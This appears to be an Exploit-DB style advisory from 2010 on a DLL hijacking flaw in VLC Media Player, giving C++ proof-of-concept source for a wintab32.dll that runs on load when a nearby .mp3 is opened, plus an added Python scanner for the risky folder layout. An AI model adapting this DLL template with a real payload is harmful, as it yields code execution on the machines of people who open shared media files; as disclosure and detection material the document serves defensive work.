Vendor: VLC Media Player
By: Secfence
CVSS: 7.5 (HIGH)
Vulnerability: DLL Hijacking
CWE: 427
Product Name: VLC Media Player
Affected Version From: VLC
Affected Version To: VLC
Patch Exists: NO
Related CWE: N/A
CPE: a:videolan:vlc_media_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

VLC Player DLL Hijack Vulnerability

Place a .mp3 file and wintab32.dll in the same folder and open the .mp3 file in VLC player. The code for wintab32.dll includes a MessageBox that displays 'Pwned' when the DLL is loaded.

Mitigation:

Ensure that the application is not vulnerable to DLL hijacking by validating the DLLs that are loaded by the application.
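
Added example (not part of the original advisory or the Exploit-DB entry): a small Python scanner for the layout described above, a DLL sitting in the same folder as a media file. The extension list, the watchlist contents and the sample directory tree are assumptions constructed for illustration.

```python
import os
import tempfile

# Assumptions for this sketch: the extension list and the watchlist are illustrative.
MEDIA_EXTS = {".mp3", ".mp4", ".avi", ".mkv", ".flac", ".wav", ".ogg"}
WATCHLIST = {"wintab32.dll"}  # DLL name taken from the advisory above


def scan(root):
    """Return one finding per directory that holds media files and DLLs but no .exe."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        lower = sorted(f.lower() for f in files)
        media = [f for f in lower if os.path.splitext(f)[1] in MEDIA_EXTS]
        dlls = [f for f in lower if f.endswith(".dll")]
        has_exe = any(f.endswith(".exe") for f in lower)
        # Install directories legitimately mix executables, DLLs and sample media.
        if media and dlls and not has_exe:
            findings.append({
                "dir": dirpath,
                "media": media,
                "dlls": dlls,
                "watchlisted": [d for d in dlls if d in WATCHLIST],
            })
    return sorted(findings, key=lambda f: f["dir"])


def build_sample_tree(root):
    """Create a constructed directory layout of empty files for the demo."""
    layout = {
        "downloads/album": ["track01.mp3", "wintab32.dll"],      # flagged
        "music": ["song.mp3", "cover.jpg"],                      # media only
        "apps/player": ["player.exe", "codec.dll", "demo.mp3"],  # install dir
    }
    for rel, names in layout.items():
        folder = os.path.join(root, *rel.split("/"))
        os.makedirs(folder)
        for name in names:
            open(os.path.join(folder, name), "wb").close()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for hit in scan(tmp):
            print(hit["dir"], hit["dlls"], "watchlisted:", hit["watchlisted"])
```

File names in the findings are lower-cased so the watchlist match is case-insensitive, as Windows file names are.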
Source

Exploit-DB raw data:

Exploit Title: VLC Player DLL Hijack Vulnerability
Date: 25 Aug 2010
Author: Secfence
Version: VLC
Tested on: Windows XP

Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in
vlc player.

Code for wintab32.dll:

/*----------*/

/* wintab32.cpp */

#include "stdafx.h"
#include "dragon.h"

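/* Proof-of-load marker: shows a message box once the DLL is mapped. */
void init() {
    /* 0x00000003 is MB_YESNOCANCEL */
    MessageBox(NULL, "Pwned", "Pwned!", 0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        /* Runs when the host process loads this DLL. */
        init();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}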

/*----------*/


Exploit By:
Vinay Katoch
www.secfence.com